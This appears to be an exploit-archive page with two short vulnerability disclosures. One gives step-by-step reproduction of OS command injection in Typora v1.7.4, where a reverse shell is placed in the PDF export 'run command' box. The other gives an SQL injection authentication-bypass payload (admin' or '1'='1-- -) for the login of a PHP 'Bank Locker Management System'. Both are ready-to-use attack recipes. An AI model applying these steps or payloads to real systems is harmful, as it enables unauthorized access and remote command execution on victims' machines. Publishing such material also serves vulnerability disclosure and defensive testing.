    # Exploit Title: Typora v1.7.4 - OS Command Injection# Discovered by: Ahmet Ümit BAYRAM# Discovered Date: 13.09.2023# Vendor Homepage: http://www.typora.io# Software Link: https://download.typora.io/windows/typora-setup-ia32.exe# Tested Version: v1.7.4 (latest)# Tested on: Windows 2019 Server 64bit# # #  Steps to Reproduce # # ## Open the application# Click on Preferences from the File menu# Select PDF from the Export tab# Check the “run command” at the bottom right and enter your reverse shellcommand into the opened box# Close the page and go back to the File menu# Then select PDF from the Export tab and click Save# Reverse shell is ready!

Typora 1.7.4 Command Injection

Bank Locker Management System suffers from a remote SQL injection vulnerability.

    # Exploit Title: Bank Locker Management System - SQL Injection# Application: Bank Locker Management System# Date: 12.09.2023# Bugs: SQL Injection # Exploit Author: SoSPiro# Vendor Homepage: https://phpgurukul.com/# Software Link: https://phpgurukul.com/bank-locker-management-system-using-php-and-mysql/# Tested on: Windows 10 64 bit Wampserver ## Description:This report highlights a critical SQL Injection vulnerability discovered in the "Bank Locker Management System" application. The vulnerability allows an attacker to bypass authentication and gain unauthorized access to the application.## Vulnerability Details:- **Application Name**: Bank Locker Management System- **Software Link**: [Download Link](https://phpgurukul.com/bank-locker-management-system-using-php-and-mysql/)- **Vendor Homepage**: [Vendor Homepage](https://phpgurukul.com/)## Vulnerability Description:The SQL Injection vulnerability is present in the login mechanism of the application. By providing the following payload in the login and password fields:Payload: admin' or '1'='1-- -An attacker can gain unauthorized access to the application with administrative privileges.## Proof of Concept (PoC):1. Visit the application locally at http://blms.local (assuming it's hosted on localhost).2. Navigate to the "banker" directory: http://blms.local/banker/3. In the login and password fields, input the following payload:4. admin' or '1'='1-- -

Tag

#windows